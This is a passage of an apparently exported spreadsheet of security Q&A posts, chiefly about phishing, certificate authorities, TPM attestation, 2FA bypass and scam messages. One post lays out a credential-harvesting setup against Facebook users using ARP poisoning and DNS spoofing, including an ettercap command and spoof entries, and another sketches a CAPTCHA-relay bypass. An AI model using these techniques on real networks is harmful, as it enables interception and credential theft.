 visible outside the chip unencrypted.&lt;/strong&gt; Malicious code could use the private keys on the TPM, so some
 way needs to be provided to ensure that malicious code cannot use the keys either. "&lt;/p&gt;
 &lt;p&gt;"The integrity measurement functions provide the capability to protect private keys from access by
 malicious code. In a trusted boot, the chip stores in the Platform Configuration Registers (PCRs)
 hashes of configuration information throughout the boot sequence. &lt;strong&gt;Once booted, data (such as
 private keys) can be ‚Äúsealed‚Äù under a PCR. The sealed data can be unsealed only if the PCR has the
 same value as at the time of sealing. Thus, if an attempt is made to boot an alternative system, or a
 virus has ‚Äúbackdoored‚Äù the operating system, the PCR value will not match and the unseal will fail,
 thus protecting the data from access by the malicious code.&lt;/strong&gt;"&lt;/p&gt;
 &lt;p&gt;"&lt;strong&gt;The attestation functions keep a list of all the software measurements committed to the PCRs,
 and can then sign them with a private key known only by the TPM. Thus, a trusted client can prove to
 a third party that its software has or has not been compromised.&lt;/strong&gt;"&lt;/p&gt;
 &lt;p&gt;Please a small example for each would be appreciable.thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tpm&gt;&lt;trusted-computing&gt;&lt;remote-attestation&gt;</t>
  </si>
  <si>
    <t>Preventing access to my public REST api from my trusted client application</t>
  </si>
  <si>
    <t>&lt;p&gt;I own a set of REST APIs and some of them don't require users to be authenticated.&lt;br&gt;
 Example could be: &lt;code&gt;api/items/index&lt;/code&gt; of an e-commerce".&lt;/p&gt;
 &lt;p&gt;Currently, I use Cookie-based tokens from my application, but only for secured API like edition of an item: &lt;code&gt;api/items/2/edit&lt;/code&gt; for instance. &lt;/p&gt;
 &lt;p&gt;What could prevent anybody to track from its own application the corresponding direct URL (let's say &lt;code&gt;https://myAppDomain/api/items/index&lt;/code&gt; and got all the items as a pure list of JSON?&lt;br&gt;
 Indeed, it could be lead to phishing... &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;rest&gt;&lt;phishing&gt;&lt;json&gt;</t>
  </si>
  <si>
    <t>Will reporting phishing emails cause problems for the victim?</t>
  </si>
  <si>
    <t>&lt;p&gt;On GMail, I've received a phishing email from someone I know, and the email has been sent to other people the victim knows. One of the emails is claiming to be from their GMail address, while the other is claiming to be from zendesk, mentioning a github project the user owns.&lt;/p&gt;
 &lt;p&gt;I'm thinking of reporting it, but I'm worried that the owner of the hijacked email account will be treated as a phisherman, rather than an non-malicious user.&lt;/p&gt;
 &lt;p&gt;GMail has a &lt;a href="http://support.google.com/accounts/bin/answer.py?hl=en&amp;amp;answer=75061" rel="nofollow noreferrer"&gt;help page on phishing&lt;/a&gt;, but it doesn't address my concern.&lt;/p&gt;
 &lt;p&gt;If I report the email as phishing, will this cause problems for the owner of the hijacked email account?&lt;/p&gt;
 &lt;p&gt;There's a question about this &lt;a href="https://webapps.stackexchange.com/questions/18992/should-i-mark-junk-emails-sent-by-an-adware-from-my-friends-email-address-as-sp"&gt;on the webapps stack exchange&lt;/a&gt;, but it didn't receive a lot of attention, and users there may not know as much about security, and incident responses, as users here.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;incident-response&gt;&lt;spam&gt;&lt;google&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Fake PayPal email with (presumably) malicious JS code</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm asking this question out of curiosity; I haven't fallen victim to this, I'm just interested in what it does.&lt;/p&gt;
 &lt;p&gt;Today I have received an email from the &amp;quot;Paypal Security Team&amp;quot;:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Dear Client,&lt;/p&gt;
 &lt;p&gt;After closely monitoring a number of unusual activities from your
 account, we decided to limit the access in the account.&lt;/p&gt;
 &lt;p&gt;Before we can restore your account back to normal, we need to get some
 information from you.&lt;/p&gt;
 &lt;p&gt;Please download and open the attachment file from this email.
 Furthermore, we ask that you complete the form that we have provided.&lt;/p&gt;
 &lt;p&gt;After doing so, we are then going to review your information and take
 the necessary steps to remove the limitations. Please understand that
 Account Limitations are applied to help keep you protected.&lt;/p&gt;
 &lt;p&gt;We apologize for the inconvenience.&lt;/p&gt;
 &lt;p&gt;Sincerely, PayPal&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Here are the headers, with the IP of my email server removed because it's actually my own, private server:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;From - Sun Sep 25 18:09:24 2016
 X-Account-Key: account1
 X-UIDL: 1:2267
 X-Mozilla-Status: 0001
 X-Mozilla-Status2: 00000000
 X-Mozilla-Keys: 
 Return-Path: &amp;lt;security@payee.net&amp;gt;
 Received: from 210.115.225.25 (210.115.225.25) (HELO hallym.ac.kr)
  by &amp;lt;myserver&amp;gt; (&amp;lt;myserverip&amp;gt;) with SMTP
  id c2fb6dfb1b98664f; Sun, 25 Sep 2016 17:59:59 +0200
 Received: from 96.53.84.19([189.149.72.109]) by hallym.ac.kr with SMTP id 160926005835170B; Mon, 26 Sep 2016 00:58:35 +0900
 From: PayPal Security Team &amp;lt;security@payee.net&amp;gt;
 Subject: Suspicious activity
 MIME-Version: 1.0
 Message-ID: &amp;lt;a2d72d51afcac93ad3eb3ce242155f4bsecurity@payee.net&amp;gt;
 Content-Type: multipart/mixed; boundary=&amp;quot;9bc43cfe03082750b916b2a227e24d86&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The message had a single attachment, an HTML file - this is the &amp;quot;form&amp;quot; mentioned in the message. In actuality, it's some sort of obfuscated JS code; I'm quite curious to find out what it does. It's available &lt;a href="http://pastebin.com/8p96WuG2" rel="nofollow noreferrer"&gt;here&lt;/a&gt;; sorry that I link to an external source, but this is quite long. Presumably the user was supposed to open the file in their browser, which would execute the JS code and do something nasty.&lt;/p&gt;
 &lt;p&gt;I've tried to &lt;a href="https://www.paypal.com/webapps/mpp/security/report-problem" rel="nofollow noreferrer"&gt;report&lt;/a&gt; this issue to PayPal, but &amp;quot;the page wasn't found&amp;quot;.&lt;/p&gt;
 &lt;p&gt;What's slightly alarming about this is that I do possess a PayPal account, and that it is registered to the email address this message was sent to.&lt;/p&gt;
 &lt;p&gt;The interesting thing about the domain is that it seems to be very old:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Updated Date: 07-oct-2015&lt;/p&gt;
 &lt;p&gt;Creation Date: 01-dec-2003&lt;/p&gt;
 &lt;p&gt;Expiration Date: 01-dec-2016&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I've checked a few &lt;code&gt;whois&lt;/code&gt; databases, with similar results.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;strong&gt;What does this do?&lt;/strong&gt;&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;Is this a new attack?&lt;/strong&gt;&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;How can I report this to PayPal?&lt;/strong&gt;&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;How come this was sent to an email address that's actually bundled to a PayPal account? Has there been a leak of some sort? Is this a coincidence?&lt;/strong&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;paypal&gt;</t>
  </si>
  <si>
    <t>User-provided phrase to verify email sender- Is this a good idea?</t>
  </si>
  <si>
    <t>&lt;p&gt;Signing up for a medical records service today, in addition to security questions (sigh) I was prompted with a field that read:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Security Phrase for Email Messages:&lt;br&gt;
 Your security phrase will be included with all email communications to verify that you received the email from &amp;lt;service&amp;gt; (this is not your password or security question answer)
 Example: I love chocolate. My dog's name is Toto.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I've never seen this anywhere before and couldn't find anything on it online (maybe I wasn't using the right terms). The reasoning seems to be that only will know your security phrase and seeing it in an email will verify it, because a phishing attack won't be able to duplicate it.&lt;/p&gt;
 &lt;p&gt;On the other hand, it seems to me not much more useful than security questions and may even train users to not use other methods of verifying incoming email.&lt;/p&gt;
 &lt;p&gt;Is this kind of thing a good way to verify emails from a service? Would it help prevent phishing attacks?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;secret-questions&gt;</t>
  </si>
  <si>
    <t>Is it a good idea to use non-ASCII names in the U.S.?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://www.bbc.com/news/world-us-canada-52557291" rel="nofollow noreferrer"&gt;Grimes and Elon Musk&lt;/a&gt; named their baby: &lt;code&gt;X √Ü A-12&lt;/code&gt;. &lt;/p&gt;
 &lt;h2&gt;What are the risks of non-ASCII names?&lt;/h2&gt;
 &lt;p&gt;For example, does the COBOL unemployment platform &lt;a href="https://www.ibm.com/support/pages/cobol-unicode-support" rel="nofollow noreferrer"&gt;support non-ASCII names&lt;/a&gt;? Would it be possible to get a social security number (&lt;a href="https://www.ssa.gov/ssnumber/" rel="nofollow noreferrer"&gt;SSN&lt;/a&gt;) for the baby?¬†Does it make their baby an easier target to impersonation attacks using &lt;a href="https://www.theguardian.com/technology/2017/apr/19/phishing-url-trick-hackers" rel="nofollow noreferrer"&gt;Unicode manipulations&lt;/a&gt;? Could the baby name trigger a &lt;a href="https://en.wikipedia.org/wiki/Code_injection" rel="nofollow noreferrer"&gt;code injection&lt;/a&gt; attack? &lt;/p&gt;
 &lt;p&gt;Clearly pure-ASCII names might cause issues: too: &lt;code&gt;\0&lt;/code&gt;, &lt;code&gt;^Z&lt;/code&gt;, &lt;code&gt;NULL&lt;/code&gt;, etc. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;injection&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Is there a list of known deprecated/unsafe certificate authorities?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a list of known deprecated/unsafe certificate authorities (CAs)?&lt;/p&gt;
 &lt;p&gt;For example:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;a href="https://krebsonsecurity.com/2013/01/turkish-registrar-enabled-phishers-to-spoof-google/" rel="nofollow noreferrer"&gt;TurkTrust&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://en.m.wikipedia.org/wiki/DigiNotar" rel="nofollow noreferrer"&gt;DigiNotar&lt;/a&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Are there other "trusted" CAs that should not be or are not trusted (by browsers anymore) and why? Or better is there a list with such CAs?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificates&gt;&lt;web-browser&gt;&lt;openssl&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>Why bother with certain types of 2fa if they can be easily bypassed?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the wild, there is a method of bypassing 2fa. The gist of it is that the attacker doesn't just phish the password, but they also phish the 2nd factor and use those for a real login on their own machine. (described in detail here &lt;a href="https://www.wandera.com/bypassing-2fa/" rel="nofollow noreferrer"&gt;https://www.wandera.com/bypassing-2fa/&lt;/a&gt;). In this attack scenario, 2fa gives a false sense of security and makes it more likely to fall victim to phishing. After all if my only protection against getting phished is checking the certificate and URL, then I'll be more likely to double check it compared to just having bought into a brand new shiny 2nd factor that touts itself to be fool proof.&lt;/p&gt;
 &lt;p&gt;If I get phished like this with the 2nd factor, the hacker is in and as long as they don't log out, they can stay in for a very long time causing all kinds of trouble. &lt;/p&gt;
 &lt;p&gt;Clearly the 2fa has a disadvantage of creating a false sense of security. The only advantages I could see is for users who share the same password across different services or for making subsequent logins using the same credentials impossible. Aren't those advantages too small relative to the disadvantage?&lt;/p&gt;
 &lt;p&gt;Obviously the answer here is re-education. Tell users to use 2fa but be keep being vigilant - make them aware of this type of attack and how nasty it is even with 2fa. But that's hard to do considering how many 2fa solutions are pushed as "THE" ultimate final solution for phishing. It's just not true and in many ways it makes the problem worse - especially for websites. Am I missing something? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;exploit&gt;&lt;multi-factor&gt;&lt;user-education&gt;</t>
  </si>
  <si>
    <t>What to do when iPhone is successfully phished</t>
  </si>
  <si>
    <t>&lt;p&gt;My girlfriend watched "some" pages on her iPhone and &lt;code&gt;facebook.you-won.com&lt;/code&gt; page appeared. She didn't know how to get rid of that JavaScript alert, so she clicked OK. After that she closed the page, and sent me the link with message "what is that".&lt;/p&gt;
 &lt;p&gt;I also clicked that link she sent. In Safari I found out, that it is some phishing page, so I closed it by restarting Safari on my iPhone and before the page loaded I quickly opened "panels" and left-swiped to close that page (all before the page loaded and that JavaScript alert appeared).&lt;/p&gt;
 &lt;p&gt;Because I think it's a phishing attack that is trying to steal your ID, I have 2 questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;What can I do with HER iPhone (is restore enough to get rid of everything that could be downloaded? When she clicked OK?)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What can I do with MY iPhone? (I restored and recovered last backup from last week - this "page" appeared today, is it enough that I didn't click OK?).&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;I have my work "exchange" account on the iPhone, do I have to worry?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I have apps that are linked to my credit account (apps from my bank), do I have to worry?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I have credit card information saved in the App Store, do I have to worry?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;She has nothing on her phone, just Facebook and some free games, so she is without problems I guess when I recover her iPhone.&lt;/p&gt;
 &lt;p&gt;Anyway none of those devices are jailbroken. Both iPhones have their original and newest iOS.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;phishing&gt;&lt;iphone&gt;</t>
  </si>
  <si>
    <t>Phishing email repository for analysis</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a repository of known phishing emails somewhere that is available for analysis purposes? I want to test some mitigation theories and need a good collection of data to test against.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Do pharma hacks always redirect to attacker page or can it also be ads on the legit website‚Äôs page?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to understand how a pharma hack works. Let's say someone searches for some illegal drug on google and clicks on a link with a domain name &lt;code&gt;www.example.com&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;Will that person be redirected to a vulnerable page of &lt;code&gt;www.example.com&lt;/code&gt; with ads of that illegal drug on it or will he be redirected to the hacker's website? (example: &lt;code&gt;www.pharmaattack.example&lt;/code&gt;)&lt;/p&gt;</t>
  </si>
  <si>
    <t>Unable to Spoof DNS in Kali</t>
  </si>
  <si>
    <t>&lt;p&gt;I am new to Kali But not new to Information Security. Warming up with Kali, I tried to &lt;code&gt;dns_spoof&lt;/code&gt;. But that didn't quite work. Here is what I did.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Tampered &lt;code&gt;ip_forward&lt;/code&gt; to 1 in &lt;code&gt;/proc/sys/net/ipv4&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;Started a credential Harvester and cloned site.&lt;/li&gt;
 &lt;li&gt;Set the POST payback to my own IP address.&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;In &lt;code&gt;etter.dns&lt;/code&gt;, added the following.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://www.facebook.com
 https://www.facebook.com
 *facebook.com
 www.facebook.com
 &lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Ran the following command&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;ettercap -T -q -i eth0 -d dns_spoof -M arp ///`&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;When I type the IP of kali machine, I am able to get the cloned facebook.com page. But When I type, facebook.com on browser, I get &lt;code&gt;ERR_CONNECTION_REFUSED&lt;/code&gt;. How can I let it access the fake page, I have created.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;P.S&lt;/strong&gt; Though, I am able to catch all the SNMP packets, my router has been sending to the victim. (So, I suppose, ARP spoofing is correctly done.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;kali-linux&gt;&lt;dns-spoofing&gt;</t>
  </si>
  <si>
    <t>sendgrid delivered malware - what's the abuse reporting procedure</t>
  </si>
  <si>
    <t>&lt;p&gt;Sendgrid delivered me malware* - where should I report that?&lt;/p&gt;
 &lt;p&gt;There was no contact info in the headers and the only abuse contact I could find in whois was domain registrar Godaddy.&lt;/p&gt;
 &lt;p&gt;Last time I dealt with Godaddy they were pretty gung-ho against spam and I really don't want to face sendgrids lawyers because I work for a different, smaller, email delivery company.&lt;/p&gt;
 &lt;p&gt;I have reported it to the claimed sender's scam channel.&lt;/p&gt;
 &lt;p&gt;(*) virustotal.com gives 10 positive results for "adwind" malware&lt;/p&gt;</t>
  </si>
  <si>
    <t>A potential CAPTCHA phishing attack against reCAPTCHA?</t>
  </si>
  <si>
    <t>&lt;p&gt;In reCAPTCHA's API (without plugin), the key part is &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;iframe src="http://www.google.com/recaptcha/api/noscript?k=your_public_key"
  height="300" width="500" frameborder="0"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;textarea name="recaptcha_challenge_field" rows="3" cols="40"&amp;gt;
  &amp;lt;/textarea&amp;gt;
  &amp;lt;input type="hidden" name="recaptcha_response_field"
  value="manual_challenge"&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The website embedding this API actually asks the user to retrieve a iframe from reCAPTCHA using a &lt;strong&gt;public key&lt;/strong&gt;. Suppose stackexchange is using reCAPTCHA and it has a public key A. And I want to attack stackexchange by circumventing its CAPTCHA. &lt;/p&gt;
 &lt;p&gt;Suppose I have a website that has some legitimate users. I can embed a reCAPTCHA API in my website that using public key A, which is stackexchange's reCAPTCHA public key. Now after the users of mine solve the CAPTCHA, they will submit a CAPTCHA challenge id and solution to my website. After that, I can submit the same challenge id and solution to stackexchange using a automated script. Then I successfully bypass the CAPTCHA challenge of stackexchange.&lt;/p&gt;
 &lt;p&gt;I am not sure whether this attack is practical or not. Suppose the browser of my users do not fill the HTTP referrer field in the request to reCAPTCHA, which prevents reCAPTCHA knowing that my website is actually using stackexchange's public key.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;captcha&gt;</t>
  </si>
  <si>
    <t>Why does the majority of email spam even exist?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a serious question and I have thought about it a lot. Not a newbie question. I am unsatisfied with the common answers&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;they try to sell things&lt;/li&gt;
 &lt;li&gt;they try to scam you&lt;/li&gt;
 &lt;li&gt;they try to do phishing&lt;/li&gt;
 &lt;li&gt;they make you click on something malicious&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Those are all obvious and reasonable motivations for sending spam email, and there is no question.&lt;/p&gt;
 &lt;p&gt;But in my experience, the vast majority of spam is none of those kinds. The vast majority I have encountered (before I decided to no even open emails any more that I don't expect) they were full of nonsense just words strung together making zero sense. And if they did offer &amp;quot;cheap cialis&amp;quot; or something there often wasn't even a link to click to actually go to a phishing site or a scam or sales site. Most spam just appears utterly pointless.&lt;/p&gt;
 &lt;p&gt;So why do spammers still flood the internet with completely pointless emails?&lt;/p&gt;
 &lt;p&gt;I have my suspicions, but I'd like to know what is known about this phenomenon. I think some motivation might be to mask higher pay-off spam with bogus so that spam filters will be overloaded and skew the system to let real threats through easier. Another possibility is that some (state actor?) just wants to suck resources out of the economy by making email almost useless.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What prevents an attacker from registering a TLS certificate for an existing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;This would be used in a phishing attack for example - coffee shop attack where google.com becomes a website controlled by the attacker completed with the magic lock next to the URL. Can I use letsencrypt to create a valid cert for any website that browsers will trust?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificates&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>Passwords - any statistics on user behavior?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm looking for analyses of how users choose and use passwords. I'm sure there are many resources out there that analyze user passwords. For instance, I've seen many people analyze dumps of password databases from sites that got hacked. I'd like to learn more about what's known on this topic, and find resources where I can learn more.&lt;/p&gt;
 &lt;p&gt;I'm particularly interested in data on questions such as:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How much entropy do users' passwords have?&lt;/li&gt;
 &lt;li&gt;How many users choose a guessable password?&lt;/li&gt;
 &lt;li&gt;What are the most common passwords?&lt;/li&gt;
 &lt;li&gt;What does the distribution of password entropy or password length look like? &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Let's collect as many of these resources and analyses as we can find. The more, the merrier!&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Also feel free to post resources that analyze other related questions about user behavior surrounding passwords, e.g.:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How many users use the same passwords on multiple sites?&lt;/li&gt;
 &lt;li&gt;How many different passwords does a single user typically have?&lt;/li&gt;
 &lt;li&gt;How do users manage their passwords?&lt;/li&gt;
 &lt;li&gt;How many users write down their passwords somewhere?&lt;/li&gt;
 &lt;li&gt;Do users pick passwords more securely for critical tasks, like online banking?&lt;/li&gt;
 &lt;li&gt;How many users are fooled by phishing sites or can be tricked into revealing their passwords?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;And so on.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;password-management&gt;&lt;password-policy&gt;</t>
  </si>
  <si>
    <t>Skype for iPhone image/link preview</t>
  </si>
  <si>
    <t>&lt;p&gt;Today a Skype contact of mine sent me a link in the chat. This link I believe was sent without the person knowing it, and it contains a reference in the URL to my Skype ID, in the form ...tumblr...#my_skype_id&lt;/p&gt;
 &lt;p&gt;Unfortunately the iphone (up to date) Skype app by default creates a preview of the link, in this case it showed me an image below the link, even though I didn't click on anything of course.&lt;/p&gt;
 &lt;p&gt;I understand the app may have some sort of built-in protection for this sort of things (or at least I hope), but still is it likely that I've been compromised? Besides changing a bunch of passwords, is there anything else I should worry about?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;skype&gt;&lt;image&gt;</t>
  </si>
  <si>
    <t>A phone call hack</t>
  </si>
  <si>
    <t>&lt;p&gt;The other day, I got a call from a relative with an email problem. After a bit more discussion, it turns out that two days previously, a man phoned my relative:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;stated he was from microsoft;&lt;/li&gt;
 &lt;li&gt;asked if my relative had some computer problems. &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;He then proceeded to talk my relative through some "computer stuff" - he can't remember more details other than he didn't give them his password. &lt;/p&gt;
 &lt;p&gt;This is obviously a scam. My question is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Is this sort of scam common? If so, what do they usually do/want?&lt;/li&gt;
 &lt;li&gt;My plan is to remove his pictures/files and rebuild his computer. What's the best way of making sure there aren't any "hidden surprises" in these files.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;hr&gt;
 &lt;p&gt;Tag suggestions welcome.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How much can we trust Certificate Authorities in issuing and securing certificates?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a general question not related to any particular website or a CA (Certification Authority).&lt;/p&gt;
 &lt;p&gt;We all know that HTTPS is an encrypted protocol, but one that relies on CAs issuing digital certificates to websites with due regard. Now, its theoretically possible for a CA to issue a proper certificate to a malware hosting site, is it not? In other words, CAs are the weakest link in the security chain of HTTPS. If that happens, then what are the implications?&lt;/p&gt;
 &lt;p&gt;Additionally, we also know that the data we browse on the internet passes through multiple hops and nodes (your ISP, the website's ISP, caches and proxies like CloudFlare, etc). Suppose if any of these entities in between got hold of the website CA certificate (public and private keys), can they capture the data being transferred? If yes, then what is a good alternative to the present HTTPS system?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;edit&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;There is another aspect of concern with HTTPS, though it may not be related to any CAs. Nowadays, every now and then you get laptops and other gadgets that come pre-installed with dicey browser certificates that allows a phishing site to be opened without any regard (Dell and Lenovo models had such cases recently, I don't have any links but you can Google them). Again, this can also be deemed as a weakness of the HTTPS system.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;http&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>Suspicious SMS about activated phone service</t>
  </si>
  <si>
    <t>&lt;p&gt;Not long ago I had heard that someone from my family had an suspicious situation with SMS service.&lt;/p&gt;
 &lt;p&gt;What happened was this person receive message like&lt;br&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Service 'Play music on calls' have been enabled. To turn off this service,
 send message ENABLE to number xxx-xxx-xxx
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;First lets start off that this person did not turned on any service manually, and I never experienced anyone to have service like that turned on automatically - it always was optional and was turning on through text like &lt;code&gt;ENABLE&lt;/code&gt;.
 Also for me it was seemed suspicious that you have to send message &lt;code&gt;ENABLE&lt;/code&gt; to turn off service, and the number was 9 digit which is not used for services like this in this specific country, where most of such services are 4 up to 6 digit long.&lt;/p&gt;
 &lt;p&gt;The person with this have went to local office of this mobile operator, and the young lady (about 20-25 years) in there and looked like on idiot, and said that you need to send this message to turn it off, without checking number and anything else.&lt;/p&gt;
 &lt;p&gt;Then this lady sent message &lt;code&gt;ENABLE&lt;/code&gt; to this number and then return message was sent something like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;To turn off service you need to send back this randomly generated key: XXXXXX
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The lady in there send this key back to this number, however I have no more informations, did she also accepted something else as well etc.&lt;/p&gt;
 &lt;p&gt;Unfortunately this is also suspicious for me, because I never heard of service which would require you to send back randomly generated key, to be turned off.&lt;/p&gt;
 &lt;p&gt;The service apparently was disabled, however there are various problems now such as it seems problematic to make incoming call to this member of family.&lt;/p&gt;
 &lt;p&gt;Also later on I have checked this number on internet and there was opinions that it is malicious number, not specific for such services.&lt;/p&gt;
 &lt;p&gt;I got few questions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What could be attackers point in such attack - the attacker did not get any personal data etc. so it doesn't seems to be phishing.&lt;/li&gt;
 &lt;li&gt;What type of attack this could be&lt;/li&gt;
 &lt;li&gt;What should be done in such case and how to explain it to older person which have no knowledge about social engineering and how it works.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Also this family member want to go back to the same local office of mobile operator, which I think is a bad idea due to what happened last time. I think that this person should call the main customer services from this mobile operator.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Please note that I have no idea which tags give to this question.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>What should I do if I'm receiving Tiktok verification code even I don't use and have deleted the application in my android device?</t>
  </si>
  <si>
    <t>&lt;p&gt;What should I do if I'm &lt;strong&gt;receiving SMS on phone giving in verification code of TikTok app despite I have deleted and no longer use the application&lt;/strong&gt; in my Android device?
 I got an international call instantly after SMS popped in my notifications.Is this &lt;strong&gt;a cyber attack or phishing&lt;/strong&gt;?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;virus&gt;&lt;phishing&gt;&lt;incident-response&gt;&lt;cyber-warfare&gt;</t>
  </si>
  <si>
    <t>Can a spam email full of junk characters be dangerous?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently, I've been receiving emails from &lt;strong&gt;JP MORGAN CHASE&lt;/strong&gt; that are blatant phishing attempts. Out of curiosity I have opened them a few times, and they're just completely full of absolute junk characters; lots of symbols, essentially akin to WingDings from Microsoft Word. On my desktop computer, Mozilla's Thunderbird seemed to open the email without any issue, but the Outlook mobile app on my S20 seemed to hang significantly on this email, and thankfully I was able to close the app. There don't seem to be any ill effects from opening it, either on my Desktop or my phone, but my question is:&lt;/p&gt;
 &lt;p&gt;Can a spam email full of junk symbols and characters be problematic for certain devices? Is it an attempt to phish or to brick a device?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ij2i3.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ij2i3.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>OAuth 2.0 when and how to use the client id and secret</t>
  </si>
  <si>
    <t>&lt;p&gt;The OAuth 2.0 protocol uses the client id and secret. It considers the client id to be public while the secret is private. Anyway it also considers to generate the client id randomly with a certain length to prevent phishing attacks. Also it says that e.g. single page applications shouldn't use a secret in some cases.&lt;/p&gt;
 &lt;p&gt;I am a little bit confused but all of this. Imagine we have a user(browser), a relying party and an id provider and starting an authentication process using the authorization code mode (maybe also the implicit mode). At which points could this process lead to vulnerabilities/risks when we are misusing/not using the client id or client secret?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vulnerability&gt;&lt;protocols&gt;&lt;oauth2&gt;</t>
  </si>
  <si>
    <t>Opened a PDF file in windows which shows up as Malware.HTML/Malicious.PDF.Gen2</t>
  </si>
  <si>
